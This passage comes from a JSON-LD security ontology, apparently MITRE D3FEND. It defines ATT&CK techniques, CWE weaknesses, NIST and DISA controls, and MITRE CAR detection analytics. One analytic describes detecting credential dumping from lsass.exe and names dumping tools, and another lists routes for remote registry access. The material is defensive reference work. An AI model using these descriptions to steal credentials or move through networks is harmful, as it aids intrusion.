      "d3f:definition": "Runtime variables which may consist of memory usage, internal temperature, operating mode, clock time, scan time, hardware status, etc.",
      "d3f:synonym": [
        "Configuration Resource",
        "System Data",
        "System Properties",
        "System Variable"
      ],
      "rdfs:label": "System Platform Variable",
      "rdfs:seeAlso": [
        {
          "@id": "https://literature.rockwellautomation.com/idc/groups/literature/documents/pm/1756-pm015_-en-p.pdf"
        },
        {
          "@id": "https://www.nrc.gov/docs/ml0932/ml093290422.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:QueryByCommittee",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-QBC",
      "d3f:definition": "Query by Committee (QBC) takes inspiration from ensemble methods. Instead of just one classifier, it takes into account the decision of a committee C = {h_1, …, h_c} of classifiers h_i. Each classifier has the same target classes, but a different underlying model or a different view on the data.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Query By Committee",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-14_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Session Audit | Capture and Record Content",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "AU-14(2)"
    },
    {
      "@id": "d3f:Reference-CAR-2020-05-001%3AMiniDumpOfLSASS_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-05-001/"
      },
      "d3f:kb-abstract": "This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call MiniDumpWriteDump. Tools like SafetyKatz, SafetyDump, and Outflank-Dumpert default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior.\n\nThe analytic is based on a Sigma analytic contributed by Samir Bousseaden and written up in a blog on MENASEC. It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in CAR-2019-08-001. In this iteration of the Sigma analytic, the GrantedAccess filter isn’t included because it didn’t seem to filter out any false positives and introduces the potential for evasion.\n\nThis analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-05-001: MiniDump of LSASS",
      "rdfs:label": "Reference - CAR-2020-05-001: MiniDump of LSASS - MITRE"
    },
    {
      "@id": "d3f:AllocateMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Allocate Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nba358e6f796f4625b5587c4f978e6abb"
        }
      ]
    },
    {
      "@id": "_:Nba358e6f796f4625b5587c4f978e6abb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:T1082",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1082",
      "d3f:definition": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-access": {
        "@id": "d3f:DecoyArtifact"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "System Information Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N0a1db89f32964ce6b6ceba2a1e57eb3c"
        },
        {
          "@id": "_:N533d909103d44cc58e5f4dbf805fd69a"
        }
      ]
    },
    {
      "@id": "_:N0a1db89f32964ce6b6ceba2a1e57eb3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DecoyArtifact"
      }
    },
    {
      "@id": "_:N533d909103d44cc58e5f4dbf805fd69a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-26",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-26",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"/dir/../filename\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '/dir/../filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:Reference-GuideToOTSecurity",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/pubs/sp/800/82/r3/final"
      },
      "d3f:kb-abstract": "This document provides guidance on how to secure operational technology (OT) while addressing their unique performance, reliability, and safety requirements. OT encompasses a broad range of programmable systems and devices that interact with the physical environment (or manage devices that interact with the physical environment). These systems and devices detect or cause a direct change through the monitoring and/or control of devices, processes, and events. Examples include industrial control systems, building automation systems, transportation systems, physical access control systems, physical environment monitoring systems, and physical environment measurement systems. The document provides an overview of OT and typical system topologies, identifies common threats and vulnerabilities to these systems, and provides recommended security countermeasures to mitigate the associated risks.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ChangeDefaultPassword"
        },
        {
          "@id": "d3f:PhysicalEnclosureHardening"
        },
        {
          "@id": "d3f:PhysicalLocking"
        },
        {
          "@id": "d3f:UserGroupPermissions"
        }
      ],
      "d3f:kb-reference-title": "Guide to Operational Technology (OT) Security",
      "rdfs:label": "Reference - NIST SP 800-82R3 Guide to Operational Technology (OT) Security, Section 6.2.1.4.5 Password Authentication"
    },
    {
      "@id": "d3f:SSHListenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that an SSH server has started listening for incoming connection requests, enabling potential clients to initiate secure sessions.",
      "rdfs:label": "SSH Listen Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionListenEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002016_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system electronically verifies Personal Identity Verification-I (PIV-I) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002016"
    },
    {
      "@id": "d3f:NetworkResourceAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkResourceAccessMediation"
      ],
      "d3f:d3fend-id": "D3-NRAM",
      "d3f:definition": "Control of access to organizational systems and services by users or processes over a network.",
      "d3f:isolates": {
        "@id": "d3f:NetworkResource"
      },
      "d3f:kb-article": "## How it works\n\nNetwork Resource Access Control involves managing and regulating access to resources within an organization's network. This includes ensuring that only authorized users or processes can access specific systems or data, often through authentication and authorization mechanisms. Examples include accessing internal databases, file servers, or application services.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:synonym": "Remote Access Control",
      "rdfs:label": "Network Resource Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:Nb443976bfa97411b94d20f94f75060b4"
        }
      ]
    },
    {
      "@id": "_:Nb443976bfa97411b94d20f94f75060b4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:T1601.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1601.002",
      "d3f:definition": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)",
      "rdfs:label": "Downgrade System Image",
      "rdfs:subClassOf": {
        "@id": "d3f:T1601"
      }
    },
    {
      "@id": "d3f:DS0002",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A profile representing a user, device, service, or application used to authenticate and access resources",
      "d3f:exactly": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the User Account Metadata component",
      "rdfs:label": "User Account (ATT&CK DS)"
    },
    {
      "@id": "d3f:ExternalControlThing",
      "@type": "owl:Class",
      "rdfs:label": "External Control Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThing"
      }
    },
    {
      "@id": "d3f:ApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application process is an instance of an application computer program that is being executed.",
      "d3f:runs": {
        "@id": "d3f:Application"
      },
      "rdfs:label": "Application Process",
      "rdfs:seeAlso": {
        "@id": "dbr:Application_software"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserProcess"
        },
        {
          "@id": "_:Ne1b2e2ead332469b88778b71030d6fbc"
        }
      ]
    },
    {
      "@id": "_:Ne1b2e2ead332469b88778b71030d6fbc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:AdobePDFFile1.3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "d3f:may-contain": {
        "@id": "d3f:JavascriptFile"
      },
      "rdfs:label": "Adobe PDF File 1.3"
    },
    {
      "@id": "d3f:CCI-000198_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces minimum password lifetime restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000198"
    },
    {
      "@id": "d3f:ComputerPlatform",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:OperatingSystem"
        },
        {
          "@id": "d3f:SystemPlatformVariable"
        }
      ],
      "d3f:definition": "Platform includes the hardware and OS. The term computing platform can refer to different abstraction levels, including a certain hardware architecture, an operating system (OS), and runtime libraries. In total it can be said to be the stage on which computer programs can run.",
      "d3f:synonym": "Computing Platform",
      "rdfs:label": "Computer Platform",
      "rdfs:seeAlso": {
        "@id": "dbr:Computing_platform"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nbee7ffa6f28747d5b6769da9e873e47d"
        },
        {
          "@id": "_:Na8b1d54d241a42f9a12e22f33b83934f"
        },
        {
          "@id": "_:Ne6af679f40fc45b6b026577c20ba57e5"
        },
        {
          "@id": "_:N8323548c58e440d29b450fa859718b38"
        }
      ]
    },
    {
      "@id": "_:Nbee7ffa6f28747d5b6769da9e873e47d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "_:Na8b1d54d241a42f9a12e22f33b83934f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "_:Ne6af679f40fc45b6b026577c20ba57e5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystem"
      }
    },
    {
      "@id": "_:N8323548c58e440d29b450fa859718b38",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:T1635.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1635.001",
      "d3f:definition": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.",
      "rdfs:label": "URI Hijacking - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1635"
      },
      "skos:prefLabel": "URI Hijacking"
    },
    {
      "@id": "d3f:DS0011",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries",
      "rdfs:comment": "This data source captures events relating to software libraries and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Module (ATT&CK DS)"
    },
    {
      "@id": "d3f:HypothesisTesting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HT",
      "d3f:definition": "A statistical hypothesis test is a method of statistical inference used to decide whether the data at hand sufficiently support a particular hypothesis. Hypothesis testing allows us to make probabilistic statements about population parameters.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Statistical hypothesis testing. [Link](https://en.wikipedia.org/wiki/Statistical_hypothesis_testing)",
      "rdfs:label": "Hypothesis Testing",
      "rdfs:subClassOf": {
        "@id": "d3f:InferentialStatistics"
      }
    },
    {
      "@id": "d3f:CCI-002409_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system blocks both inbound and outbound communications traffic between organization-defined communication clients that are independently configured by end users and external service providers.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002409"
    },
    {
      "@id": "d3f:CWE-776",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-776",
      "d3f:definition": "The product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.",
      "d3f:synonym": [
        "Billion Laughs Attack",
        "XEE",
        "XML Bomb"
      ],
      "rdfs:label": "Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-405"
        },
        {
          "@id": "d3f:CWE-674"
        }
      ]
    },
    {
      "@id": "d3f:CWE-732",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-732",
      "d3f:definition": "The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.",
      "rdfs:label": "Incorrect Permission Assignment for Critical Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-285"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0048.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.000",
      "d3f:definition": "Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary.",
      "rdfs:label": "Financial Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "Financial Harm"
    },
    {
      "@id": "d3f:PhysicalAccessAlarmEvent",
      "@type": "owl:Class",
      "rdfs:comment": "An event occurring when a physical threshold is crossed.",
      "rdfs:label": "Physical Access Alarm Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalEvent"
      }
    },
    {
      "@id": "d3f:OperatingSystemPackagingTool",
      "@type": "owl:Class",
      "d3f:definition": "A software packaging tool oriented on building a software package for a particular operating system (e.g., rpmbuild).",
      "rdfs:label": "Operating System Packaging Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwarePackagingTool"
      }
    },
    {
      "@id": "d3f:T1534",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1534",
      "d3f:definition": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is a multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)",
      "d3f:produces": {
        "@id": "d3f:Email"
      },
      "rdfs:label": "Internal Spearphishing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Nd4ade50866bc4b5e9f4665dc41c4f46c"
        }
      ]
    },
    {
      "@id": "_:Nd4ade50866bc4b5e9f4665dc41c4f46c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:T1428",
      "@type": "owl:Class",
      "d3f:attack-id": "T1428",
      "d3f:definition": "Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.",
      "rdfs:label": "Exploitation of Remote Services - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileLateralMovementTechnique"
      },
      "skos:prefLabel": "Exploitation of Remote Services"
    },
    {
      "@id": "d3f:CWE-627",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-627",
      "d3f:definition": "In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.",
      "d3f:synonym": "Dynamic evaluation",
      "rdfs:label": "Dynamic Variable Evaluation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-914"
      }
    },
    {
      "@id": "d3f:Reference-Intrusion_and_misuse_deterrence_system_employing_a_virtual_network",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7240368B1"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkTrafficSignatureAnalysis"
      },
      "d3f:kb-reference-title": "Intrusion and misuse deterrence system employing a virtual network",
      "rdfs:label": "Reference - Intrusion and misuse deterrence system employing a virtual network"
    },
    {
      "@id": "d3f:NetworkSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network session is a temporary and interactive information interchange between two or more devices communicating over a network. A session is established at a certain point in time, and then 'torn down' - brought to an end - at some later point. An established communication session may involve more than one message in each direction. A session is typically stateful, meaning that at least one of the communicating parties needs to hold current state information and save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses. Network sessions may be established and implemented as part of protocols and services at the application, session, or transport layers of the OSI model.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Network Session",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:OSI_model"
        },
        {
          "@id": "dbr:Session_(computer_science)"
        },
        {
          "@id": "https://schema.ocsf.io/objects/network_connection_info"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Session"
        },
        {
          "@id": "_:Nd70018da4d524df4ac2725217ad88e1b"
        }
      ]
    },
    {
      "@id": "_:Nd70018da4d524df4ac2725217ad88e1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:ApplicationInventorySensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects information on applications on an endpoint.",
      "d3f:monitors": {
        "@id": "d3f:Application"
      },
      "rdfs:label": "Application Inventory Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N057fb3801fda42339b727d462378b154"
        }
      ]
    },
    {
      "@id": "_:N057fb3801fda42339b727d462378b154",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:T1578.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.004",
      "d3f:definition": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.",
      "d3f:modifies": [
        {
          "@id": "d3f:CloudInstanceMetadata"
        },
        {
          "@id": "d3f:Host"
        }
      ],
      "rdfs:label": "Revert Cloud Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:N2e1dc35379db4d67a5b32929214ae3ef"
        },
        {
          "@id": "_:N64b180cc56b14f889ab2e3b43303ffab"
        }
      ]
    },
    {
      "@id": "_:N2e1dc35379db4d67a5b32929214ae3ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "_:N64b180cc56b14f889ab2e3b43303ffab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:Sensor",
      "@type": "owl:Class",
      "d3f:definition": "In the broadest definition, a sensor is a device, module, machine, or subsystem that detects events or changes in its environment and sends the information to other electronics, frequently a computer.",
      "rdfs:label": "Sensor",
      "rdfs:seeAlso": [
        {
          "@id": "https://en.wikipedia.org/wiki/Sensor"
        },
        {
          "@id": "https://schema.ocsf.io/objects/agent"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDCore"
        },
        {
          "@id": "d3f:DigitalInformationBearer"
        }
      ]
    },
    {
      "@id": "d3f:Network",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network is a group of computers that use a set of common communication protocols over digital interconnections for the purpose of sharing resources located on or provided by the network nodes. The interconnections between nodes are formed from a broad spectrum of telecommunication network technologies, based on physically wired, optical, and wireless radio-frequency methods that may be arranged in a variety of network topologies.",
      "rdfs:label": "Network",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/03826490-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Computer Network"
    },
    {
      "@id": "d3f:CCI-001352_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization protects the audit records of non-local accesses to privileged accounts and the execution of privileged functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001352"
    },
    {
      "@id": "d3f:RemoteAuthorizationService",
      "@type": "owl:Class",
      "d3f:definition": "A remote authorization service provides for the authorization of a user across a network (i.e., remotely).",
      "rdfs:label": "Remote Authorization Service",
      "rdfs:subClassOf": {
        "@id": "d3f:AuthorizationService"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCXFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOCX File"
    },
    {
      "@id": "d3f:CWE-356",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-356",
      "d3f:definition": "The product's user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system.",
      "rdfs:label": "Product UI does not Warn User of Unsafe Actions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:T1566",
      "@type": "owl:Class",
      "d3f:attack-id": "T1566",
      "d3f:definition": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.",
      "rdfs:label": "Phishing",
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000888_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to protect the integrity and confidentiality of non-local maintenance and diagnostic communications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000888"
    },
    {
      "@id": "d3f:DISA_FSO",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Organization"
      ],
      "d3f:definition": "Defense Information Systems Agency (DISA) Field Security Office (FSO)",
      "rdfs:label": "DISA FSO"
    },
    {
      "@id": "d3f:WindowsDeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Deletes an existing file.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtDeleteFile"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-deletefile"
      },
      "rdfs:label": "Windows DeleteFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIDeleteFile"
        },
        {
          "@id": "_:N4a5f77a4d00840088b021d2f57102fa8"
        }
      ]
    },
    {
      "@id": "_:N4a5f77a4d00840088b021d2f57102fa8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtDeleteFile"
      }
    },
    {
      "@id": "d3f:Reference-RemoteRegistry_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-005/"
      },
      "d3f:kb-abstract": "An adversary can remotely manipulate the registry of another machine if the RemoteRegistry service is enabled and valid credentials are obtained. While the registry is remotely accessed, it can be used to prepare a Lateral Movement technique, discover the configuration of a host, achieve Persistence, or anything that aids an adversary in achieving the mission. Like most ATT&CK techniques, this behavior can be used legitimately, and the reliability of an analytic depends on the proper identification of the pre-existing legitimate behaviors. Although this behavior is disabled in many Windows configurations, it is possible to remotely enable the RemoteRegistry service, which can be detected with CAR-2014-03-005.\n\nRemote access to the registry can be achieved via\n\n* Windows API function RegConnectRegistry\n* command line via reg.exe\n* graphically via regedit.exe\n\nAll of these behaviors call into the Windows API, which uses the NamedPipe WINREG over SMB to handle the protocol information. This network traffic can be decoded with Wireshark or a similar sensor, and can also be detected by hooking the API function.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AdministrativeNetworkActivityAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-005: Remote Registry",
      "rdfs:label": "Reference - CAR-2014-11-005: Remote Registry - MITRE"
    },
    {
      "@id": "d3f:CCI-003123_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
